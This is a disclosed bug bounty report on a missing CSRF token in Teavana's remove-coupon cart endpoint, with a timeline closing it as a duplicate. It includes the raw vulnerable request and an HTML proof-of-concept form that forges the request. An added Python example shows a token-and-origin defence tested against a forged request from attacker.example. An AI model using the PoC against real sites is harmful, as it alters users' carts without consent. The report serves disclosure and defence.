Missing CSRF Token On Remove Coupon From Cart
State Duplicate (Closed)
Disclosed publicly 2019-02-08T19:05:20.751Z
Reported To
Weakness Cross-Site Request Forgery (CSRF)
Bounty
Timeline
submitted a report to Starbucks .
2017-05-11T16:03:57.693Z

Hi,
When removing a coupon there's no CSRF token; at this time I used the ███████ coupon to reproduce it.

Vulnerable Request

POST /on/demandware.store/Sites-Teavana-Site/default/Cart-RemoveCoupon HTTP/1.1
Host: www.teavana.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.teavana.com/us/en/cart
Content-Length: 17
Cookie: some cookie
Connection: close

couponCode=██████████

PoC Code

<html>
<body>
<form action="https://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/Cart-RemoveCoupon" method="POST">
<input type="hidden" name="couponCode" value="███" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Edit the couponCode with the name of the coupon.

Thanks,
If you need a video, I will create one!

Regards,
Frans
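
The fix for the class of issue reported above is a synchronizer token checked on every state-changing cart request, with an Origin/Referer check as defence in depth. The following Python is an added illustration written for this page; it is not Teavana's or Demandware's code, and the names `Session`, `Request`, `remove_coupon` and the form field `csrf_token` are assumptions. It builds a constructed forged submission shaped like the PoC form (cross-origin, no token) and a constructed legitimate submission, and shows that only the latter changes cart state.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlparse

# Constructed example, not the site's own code. All names are hypothetical.
SITE_ORIGIN = "https://www.teavana.com"   # only origin allowed to mutate the cart
TOKEN_FIELD = "csrf_token"                # hypothetical form field carrying the token
ENDPOINT = "/on/demandware.store/Sites-Teavana-Site/default/Cart-RemoveCoupon"


@dataclass
class Session:
    """Server-side session: the CSRF token lives here, bound to the user."""
    coupons: set = field(default_factory=set)
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    body: str

    def form(self) -> dict:
        return {k: v[0] for k, v in parse_qs(self.body).items()}


def origin_allowed(req: Request) -> bool:
    """Defence in depth: Origin (Referer as fallback) must be our own site."""
    origin = req.headers.get("Origin")
    if origin is None:
        ref = req.headers.get("Referer")
        if ref:
            p = urlparse(ref)
            origin = f"{p.scheme}://{p.netloc}"
    return origin == SITE_ORIGIN


def token_valid(req: Request, session: Session) -> bool:
    """Synchronizer token pattern with a constant-time comparison."""
    submitted = req.form().get(TOKEN_FIELD, "")
    return hmac.compare_digest(submitted, session.csrf_token)


def remove_coupon(req: Request, session: Session) -> tuple:
    """Handler: reject before touching state; returns (status, message)."""
    if req.method != "POST":
        return 405, "method not allowed"
    if not origin_allowed(req):
        return 403, "cross-origin request rejected"
    if not token_valid(req, session):
        return 403, "missing or invalid CSRF token"
    code = req.form().get("couponCode", "")
    session.coupons.discard(code)
    return 200, f"removed {code}"


def forged_request() -> Request:
    """Constructed: what a browser sends when the PoC form is auto-submitted
    from another site. The token is absent and the Origin is foreign."""
    return Request("POST", ENDPOINT,
                   {"Origin": "https://attacker.example",
                    "Referer": "https://attacker.example/poc.html",
                    "Content-Type": "application/x-www-form-urlencoded"},
                   "couponCode=SAVE10")


def legit_request(session: Session) -> Request:
    """Constructed: the site's own cart page submitting with its token."""
    return Request("POST", ENDPOINT,
                   {"Origin": SITE_ORIGIN,
                    "Referer": f"{SITE_ORIGIN}/us/en/cart",
                    "X-Requested-With": "XMLHttpRequest",
                    "Content-Type": "application/x-www-form-urlencoded"},
                   f"couponCode=SAVE10&{TOKEN_FIELD}={session.csrf_token}")


if __name__ == "__main__":
    s = Session(coupons={"SAVE10"})
    print(remove_coupon(forged_request(), s), sorted(s.coupons))
    print(remove_coupon(legit_request(s), s), sorted(s.coupons))
```

Note that the `X-Requested-With: XMLHttpRequest` header seen in the original request is not sent by a plain cross-site form post, so checking for it would also have blocked this particular PoC; it is not a substitute for the token, since the header is trivial to add from any context that can already make credentialed requests, but the token plus origin check above does not rely on it.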

overice Activities::BugDuplicate
2017-05-11T17:27:26.131Z
Hi @apapedulimu, Thank you for your submission. Unfortunately, we had previously been made aware of this issue by another hacker. That being said I will close this as `Duplicate`. Thank you for participating in the Starbucks bug bounty program. We look forward to more reports from you in the future. Best Regards, @overice


apapedulimu Activities::AgreedOnGoingPublic
2017-05-11T17:31:46.852Z


overice Activities::Comment
2017-05-15T16:56:39.094Z
Hi @apapedulimu, Since the original report is still unresolved, we are not ready to disclose this issue. However, we'd be happy to disclose it as soon as the original report reaches resolution. Thank you for your patience! Best Regards, @overice


overice Activities::ChangedScope
2018-11-21T19:54:55.927Z


overice Activities::AgreedOnGoingPublic
2019-02-08T19:05:20.644Z


overice Activities::ReportBecamePublic
2019-02-08T19:05:20.783Z